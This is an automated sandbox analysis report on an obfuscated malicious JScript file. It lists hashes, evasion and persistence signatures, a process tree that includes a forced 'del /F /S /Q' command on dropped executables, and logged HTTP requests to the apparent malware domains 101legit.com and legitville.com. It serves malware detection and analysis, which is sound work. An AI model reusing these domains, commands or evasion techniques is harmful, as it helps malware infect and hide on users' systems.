Loading ...

Play interactive tourEdit tour

Analysis Report xPUqa4qbDL

Overview

General Information

Sample Name:xPUqa4qbDL (renamed file extension from none to js)
Analysis ID:365904
MD5:e43e6029bb62780558539d8f052d3eaa
SHA1:41aa8edac913960793f6cdf0a27f0a64b8260e6f
SHA256:d9cc91ff8d5472ce7224c773927e03cf44a11b5f452e6c65fa9899068ed1f6b7
Infos:

Most interesting Screenshot:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Renames wscript.exe to bypass HIPS
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the product ID of Windows
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6336 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6432 cmdline: 'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxje MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • cmd.exe (PID: 6560 cmdline: 'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ibfmvoj.exe (PID: 6652 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwl MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • ibfmvoj.exe (PID: 6692 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesyl MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • ibfmvoj.exe (PID: 6860 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • ibfmvoj.exe (PID: 7128 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • ibfmvoj.exe (PID: 852 cmdline: 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000003.238666236.0000025BBBBB1000.00000004.00000001.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
  • 0x6a6a:$s12: WScript.Shell

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: 101legit.comVirustotal: Detection: 6%Perma Link
Source: ww7.101legit.comVirustotal: Detection: 6%Perma Link
Source: http://101legit.com/Virustotal: Detection: 6%Perma Link
Source: http://101legit.com/0.htmlVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: xPUqa4qbDL.jsVirustotal: Detection: 35%Perma Link
Source: Binary string: scrrun.pdb source: wscript.exe, 00000002.00000002.453794143.000002156D440000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452744081.000001F7A2110000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.456195117.000001D32E5B0000.00000002.00000001.sdmp
Source: Binary string: wscript.pdbGCTL source: wscript.exe, 00000002.00000003.193074239.000002156F2CE000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000000.194981933.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 00000008.00000000.195930312.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000A.00000000.218346698.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000B.00000000.235028464.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000E.00000002.263613446.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe.2.dr
Source: Binary string: wshom.pdbUGP source: wscript.exe, 00000002.00000002.457281390.000002156F240000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.453416950.000001F7A38D0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457114333.000001D32E7C0000.00000002.00000001.sdmp
Source: Binary string: wscript.pdb source: wscript.exe, 00000002.00000003.193074239.000002156F2CE000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000000.194981933.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 00000008.00000000.195930312.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000A.00000000.218346698.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000B.00000000.235028464.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000E.00000002.263613446.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe.2.dr
Source: Binary string: wshom.pdb source: wscript.exe, 00000002.00000002.457281390.000002156F240000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.453416950.000001F7A38D0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457114333.000001D32E7C0000.00000002.00000001.sdmp
Source: Binary string: scrrun.pdbUGP source: wscript.exe, 00000002.00000002.453794143.000002156D440000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452744081.000001F7A2110000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.456195117.000001D32E5B0000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B9D4A0 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,7_2_00007FF7C0B9D4A0
Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: global trafficHTTP traffic detected: GET /0.html HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: legitville.com
Source: global trafficHTTP traffic detected: GET /0.html HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: 101legit.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: ww7.101legit.com
Source: global trafficHTTP traffic detected: GET /0.html HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: legitville.com
Source: global trafficHTTP traffic detected: GET /0.html HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: 101legit.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: ww7.101legit.com
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <img src="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/85288795/coreui.statics/images/social/facebook.png" alt="Facebook"> equals www.facebook.com (Facebook)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <img src="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/93690392/coreui.statics/images/social/twitter.png" alt="Twitter"> equals www.twitter.com (Twitter)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <img src="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/b23f9ba2/coreui.statics/images/social/linkedin.png" alt="LinkedIn"> equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <img src="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/c79952ca/coreui.statics/images/social/youtube.png" alt="Youtube"> equals www.youtube.com (Youtube)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <source type="image/svg+xml" srcset="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/2532198d/coreui.statics/images/social/facebook.svg"> equals www.facebook.com (Facebook)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <source type="image/svg+xml" srcset="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/2d505657/coreui.statics/images/social/youtube.svg"> equals www.youtube.com (Youtube)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <source type="image/svg+xml" srcset="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/413bd4a8/coreui.statics/images/social/linkedin.svg"> equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <source type="image/svg+xml" srcset="//www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/6f40299c/coreui.statics/images/social/twitter.svg"> equals www.twitter.com (Twitter)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <a data-m='{"id":"n1m1r6a2","sN":1,"aN":"m1r6a2"}' itemprop="sameAs" href="https://www.facebook.com/microsoftschweiz" title="Microsoft auf Facebook folgen (&#246;ffnet in einem neuen Tab)." target=&quot;_blank&quot;> equals www.facebook.com (Facebook)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <a data-m='{"id":"n3m1r6a2","sN":3,"aN":"m1r6a2"}' itemprop="sameAs" href="https://www.linkedin.com/company/1035" title="Microsoft auf LinkedIn folgen (&#246;ffnet in einem neuen Tab)." target=&quot;_blank&quot;> equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: <a data-m='{"id":"n4m1r6a2","sN":4,"aN":"m1r6a2"}' itemprop="sameAs" href="https://www.youtube.com/user/MicrosoftCH" title="Microsoft auf YouTube folgen (&#246;ffnet in einem neuen Tab)." target=&quot;_blank&quot;> equals www.youtube.com (Youtube)
Source: unknownDNS traffic detected: queries for: legitville.com
Source: wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186418382.000001F46837E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189410935.000002156F153000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196507204.000001F7A3F93000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197704132.000001D32E6D3000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221297281.000001F1F8223000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236186995.0000025BBDB73000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254624235.000001DBCE543000.00000004.00000001.sdmpString found in binary or memory: http://101legit.com/
Source: wscript.exe, 00000002.00000003.203396181.000002156F014000.00000004.00000001.sdmp, wscript.exe, 00000002.00000002.459547225.000002156F812000.00000004.00000001.sdmpString found in binary or memory: http://101legit.com/0.html
Source: wscript.exe, 00000002.00000002.459496028.000002156F700000.00000004.00000001.sdmpString found in binary or memory: http://101legit.com/0.html1
Source: wscript.exe, 00000002.00000003.202889828.000002156F338000.00000004.00000001.sdmpString found in binary or memory: http://101legit.com/0.htmle843
Source: wscript.exe, 00000002.00000003.210274976.000002156F880000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: http://github.com/aFarkas/lazysizes
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: http://github.com/requirejs/domReady
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: http://github.com/requirejs/requirejs/LICENSE
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmpString found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2dCNN
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmpString found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2dKBu
Source: wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186418382.000001F46837E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189410935.000002156F153000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196507204.000001F7A3F93000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197704132.000001D32E6D3000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221297281.000001F1F8223000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236186995.0000025BBDB73000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254624235.000001DBCE543000.00000004.00000001.sdmpString found in binary or memory: http://legitville.com/
Source: wscript.exe, 00000002.00000002.459496028.000002156F700000.00000004.00000001.sdmpString found in binary or memory: http://legitville.com/0.html
Source: wscript.exe, 00000002.00000003.339266046.000002156F320000.00000004.00000001.sdmpString found in binary or memory: http://legitville.com/0.htmlll
Source: wscript.exe, 00000002.00000003.210274976.000002156F880000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: wscript.exe, 00000002.00000003.210274976.000002156F880000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: wscript.exe, 00000002.00000003.210219910.000002156F351000.00000004.00000001.sdmpString found in binary or memory: http://requirejs.org/docs/errors.html#
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/Organization
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmpString found in binary or memory: http://ww7.101legit.com
Source: wscript.exe, 00000002.00000003.210589425.000002156F82B000.00000004.00000001.sdmp, wscript.exe, 00000002.00000002.459547225.000002156F812000.00000004.00000001.sdmpString found in binary or memory: http://ww7.101legit.com/
Source: wscript.exe, 00000002.00000003.210589425.000002156F82B000.00000004.00000001.sdmpString found in binary or memory: http://ww7.101legit.com/ll
Source: wscript.exe, 00000000.00000003.188728848.000001F46835C000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.186393509.000001F4683A2000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189473003.000002156F12D000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.189436287.000002156F172000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.456011040.000001F7A3FBC000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000003.196514570.000001F7A3F6D000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000003.197733159.000001D32E6AD000.00000004.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457059419.000001D32E6FC000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000A.00000003.221994651.000001F1F824C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236818352.0000025BBDB9C000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000B.00000003.236226752.0000025BBDB4D000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254530291.000001DBCE562000.00000004.00000001.sdmp, ibfmvoj.exe, 0000000E.00000003.254663132.000001DBCE51D000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/
Source: ibfmvoj.exe, 0000000A.00000003.221366463.000001F1F81FD000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/0
Source: wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmpString found in binary or memory: https://assets.onestore.ms
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmpString found in binary or memory: https://azure.micro
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://channel9.msdn.com/
Source: wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE3NYMe?ver=7b0e&amp;q=
Source: wscript.exe, 00000002.00000003.210157018.000002156D1D6000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4D5uF?ver=204a&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DRie?ver=f61d&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DfTp?ver=8993&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4E4rT?ver=2072&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4H9G0?ver=5bb0&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4HCqV?ver=5c59&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Mznr?ver=36b6&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pkvE?ver=d8fc&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pndL?ver=5217&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pxBu?ver=eae5&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4rriw?ver=b2d5&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4rzE2?ver=aa0b&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sO6R?ver=7d62&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQDc?ver=30c2&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u7Rm?ver=6f53&amp;q=
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4vykv?ver=6019&amp;q=
Source: wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.210173138.000002156F279000.00000004.00000001.sdmpString found in binary or memory: https://mem.gfx.ms
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://mem.gfx.ms/meversion?partner=MSHomePage&amp;market=de-ch&amp;uhf=1
Source: wscript.exe, 00000002.00000003.210512662.000002156F34E000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202797295.000002156F850000.00000004.00000001.sdmpString found in binary or memory: https://microsoftwindows.112.2o7.net
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/de-ch/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://outlook.live.com/owa/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://products.office.com/de-ch/academic/compare-office-365-education-plans
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmpString found in binary or memory: https://products.office~
Source: wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmpString found in binary or memory: https://publisher.liveperson.net
Source: wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmpString found in binary or memory: https://publisher.liveperson.net/iframe-le-tag/iframe.html?lpsite=60270350&amp;lpsection=store-sales
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/ItemList
Source: wscript.exe, 00000002.00000002.459601886.000002156F846000.00000004.00000001.sdmp, wscript.exe, 00000002.00000003.202884308.000002156F330000.00000004.00000001.sdmpString found in binary or memory: https://swiftkey.com/images/misc/stores/app/en.png
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/microsoft_ch
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://ussearchprod.trafficmanager.net/services/api/v1.0/store/categories
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/microsoftch/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com/company/1035
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://www.onenote.com/?omkt=de-CH
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://www.skype.com/de/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://www.xbox.com/
Source: wscript.exe, 00000002.00000003.210110395.000002156D213000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/MicrosoftCH
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B9AE00 GetWindowLongPtrA,SetWindowLongPtrA,NtdllDefWindowProc_A,7_2_00007FF7C0B9AE00
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B9AC78 KillTimer,GetLastError,KillTimer,GetLastError,SetTimer,GetLastError,NtdllDefWindowProc_A,KillTimer,EnumThreadWindows,PostQuitMessage,7_2_00007FF7C0B9AC78
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA21C47_2_00007FF7C0BA21C4
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B9AE8C7_2_00007FF7C0B9AE8C
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA1A347_2_00007FF7C0BA1A34
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B983487_2_00007FF7C0B98348
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA14A07_2_00007FF7C0BA14A0
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B991AC7_2_00007FF7C0B991AC
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B969547_2_00007FF7C0B96954
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA0A947_2_00007FF7C0BA0A94
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B95A347_2_00007FF7C0B95A34
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA340C7_2_00007FF7C0BA340C
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA1F687_2_00007FF7C0BA1F68
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B97B1C7_2_00007FF7C0B97B1C
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B934D87_2_00007FF7C0B934D8
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA1C9C7_2_00007FF7C0BA1C9C
